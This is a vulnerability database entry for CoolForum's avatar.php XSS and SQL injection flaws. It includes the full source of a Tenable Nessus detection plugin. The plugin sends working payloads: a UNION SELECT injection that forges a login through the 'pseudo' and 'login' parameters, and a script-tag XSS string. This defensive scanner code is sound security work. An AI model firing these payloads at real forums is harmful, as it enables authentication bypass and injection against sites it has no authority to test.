Vulnerabilities > CVE-2005-0857 - Cross-Site Scripting And SQL Injection vulnerability in CoolForum

CVSS 4.3 - MEDIUM
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE

Summary

Cross-site scripting (XSS) vulnerability in avatar.php for CoolForum 0.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the img parameter.

Vulnerable Configurations

Part Description Count
Application
Coolforum
1

Nessus

NASL family: CGI abuses
NASL id: COOLFORUM_XSS_SQL.NASL
description: The remote host is running a version of CoolForum that suffers from multiple input validation vulnerabilities. - Multiple SQL Injection Vulnerabilities Due to a failure to properly sanitize user-input supplied through the …
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 17597
published: 2005-03-22
reporter: This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/17597
title: CoolForum Multiple Vulnerabilities (SQLi, XSS)
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

# Registration branch: when Nessus loads the plugin with 'description'
# set, only the metadata below is recorded and the checks further down
# never run (the branch ends with exit(0)).
if (description)
{
  script_id(17597);
  script_version("1.21");

  script_cve_id("CVE-2005-0857", "CVE-2005-0858");
  script_bugtraq_id(12852);

  script_name(english:"CoolForum Multiple Vulnerabilities (SQLi, XSS)");

  # Report text shown to the user.
  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that suffers from
multiple issues." );
  script_set_attribute(attribute:"description", value:
"The remote host is running a version of CoolForum that suffers from
multiple input validation vulnerabilities. 

  - Multiple SQL Injection Vulnerabilities
    Due to a failure to properly sanitize user-input supplied 
    through the 'pseudo' parameter of the 'admin/entete.php' script
    and the 'ilogin' parameter of the 'register.php' script, an
    attacker may be able to manipulate SQL queries and view
    arbitrary database contents provided PHP's 'magic_quotes_gpc'
    setting is disabled.

  - A Cross-Site Scripting Vulnerability
    It is possible to inject arbitrary script and HTML code into the
    'img' parameter of the 'avatar.php' script. An attacker can
    exploit these flaws to cause code to run on a user's browser
    within the context of the remote site, enabling him to steal
    authentication cookies, access data recently submitted by the
    user, and the like." );
  script_set_attribute(attribute:"see_also", value:"http://securitytracker.com/alerts/2005/Mar/1013474.html" );
  script_set_attribute(attribute:"solution", value:
"Upgrade to CoolForum version 0.8.1 or later." );

  # Scoring, exploitability and CWE metadata.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  # Publication dates and plugin type, then close the attribute list.
  script_set_attribute(attribute:"plugin_publication_date", value: "2005/03/22");
  script_set_attribute(attribute:"vuln_publication_date", value: "2005/03/18");
  script_cvs_date("Date: 2018/06/13 18:56:26");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_summary(english:"Checks for cross-site scripting and SQL injection vulnerabilities in CoolForum");

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");

  # Launch conditions: depends on http_version.nasl, is skipped when the
  # 'Settings/disable_cgi_scanning' key is set, and needs an HTTP port
  # plus the 'www/PHP' key.
  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}

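include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


# Reports the flaw on 'port', records the KB flags and stops the plugin.
#
# nb: each probe below demonstrates only one of the two issue classes,
#     but a single hit is taken as evidence that the whole install is
#     affected, so both 'XSS' and 'SQLInjection' are recorded whichever
#     probe fired (this mirrors the original per-check reporting).
function report_and_exit(port)
{
  security_warning(port);
  set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
  set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
  exit(0);
}


port = get_http_port(default:80, php: 1);


foreach dir (cgi_dirs())
{
  # Grab index.php; a failed request ends the plugin (exit_on_fail).
  res = http_get_cache(item:string(dir, "/index.php"), port:port, exit_on_fail: 1);

  # If it's CoolForum...
  if (egrep(string:res, pattern:"Powered by .*CoolForum"))
  {
    # Try the SQL injections.
    #
    # nb: these particular exploits may not be particularly
    #     interesting, but they at least demonstrate the
    #     install is vulnerable.
    #
    # - requires PHP's magic_quotes to be off.
    postdata = string(
      "action=login&",
      "password=&",
      # nb: this forces a match for id=12345, user "nessus", who has
      #     an empty password and has already been confirmed. It
      #     does not, though, add the user to any databases.
      "pseudo='Union%20SELECT%20'12345','nessus','','','1'%20FROM%20CF_config%23"
    );
    init_cookiejar();
    # nb: the response body is not needed; the cookie jar is inspected
    #     instead, so a failed request simply falls through to the next
    #     probe rather than ending the plugin.
    http_send_recv3(
      method: 'POST',
      item: string(dir, "/admin/entete.php"),
      version: 11,
      data: postdata,
      port: port,
      add_headers: make_array("Content-Type", "application/x-www-form-urlencoded")
    );
    # If we get a CoolForumID cookie, there's a problem.
    if (get_http_cookie(name: "CoolForumID")) report_and_exit(port:port);

    # - only in CoolForum 0.8 and it requires CoolForum's confirmation
    #   by mail option to be enabled (it is by default).
    r = http_send_recv3(method: 'GET', port: port, exit_on_fail: 1,
      item:string(dir, "/register.php?",
        "action=confirm&",
        # nb: this is an empty string encoded as md5; eg, 'md5("")'.
        "s=d41d8cd98f00b204e9800998ecf8427e&",
        # nb: this forces a match for id=12345, user "nessus", who has
        #     an empty password and has already been confirmed. It
        #     does not, though, add the user to any databases.
        "login='Union%20SELECT%20'12345','nessus','','','1'%20FROM%20CF_config%23"
      ));
    # If the response indicates we've already confirmed, there's a problem.
    #
    # nb: the '.' wildcards presumably stand in for the accented letters
    #     of the French message so the match does not depend on the
    #     page's charset — confirm against a live response if this is
    #     ever tightened.
    if (egrep(string: r[2], pattern:"<b>Op.+ration impossible, votre inscription a d.j. .t. confirm.e!</b>"))
      report_and_exit(port:port);

    # Try an XSS exploit - a simple alert to display "Nessus was here".
    #
    # nb: this requires PHP's display_errors to be enabled.
    xss = "'><script>alert('Nessus was here');</script>";
    # nb: the url-encoded version is what we need to pass in.
    exss = "'%3E%3Cscript%3Ealert('Nessus%20was%20here')%3B%3C%2Fscript%3E";
    r = http_send_recv3(port: port, method: 'GET', item:string(dir, "/avatar.php?img=", exss), exit_on_fail: 1);
    # If we see our XSS reflected verbatim, there's a problem.
    #
    # nb: a plain substring test is used rather than egrep(): the payload
    #     contains '(' and ')', which egrep() treats as a regex group, so
    #     the literal "alert('Nessus was here');" in the page would not
    #     have matched the pattern and the check would silently miss.
    if (xss >< r[2]) report_and_exit(port:port);
  }
}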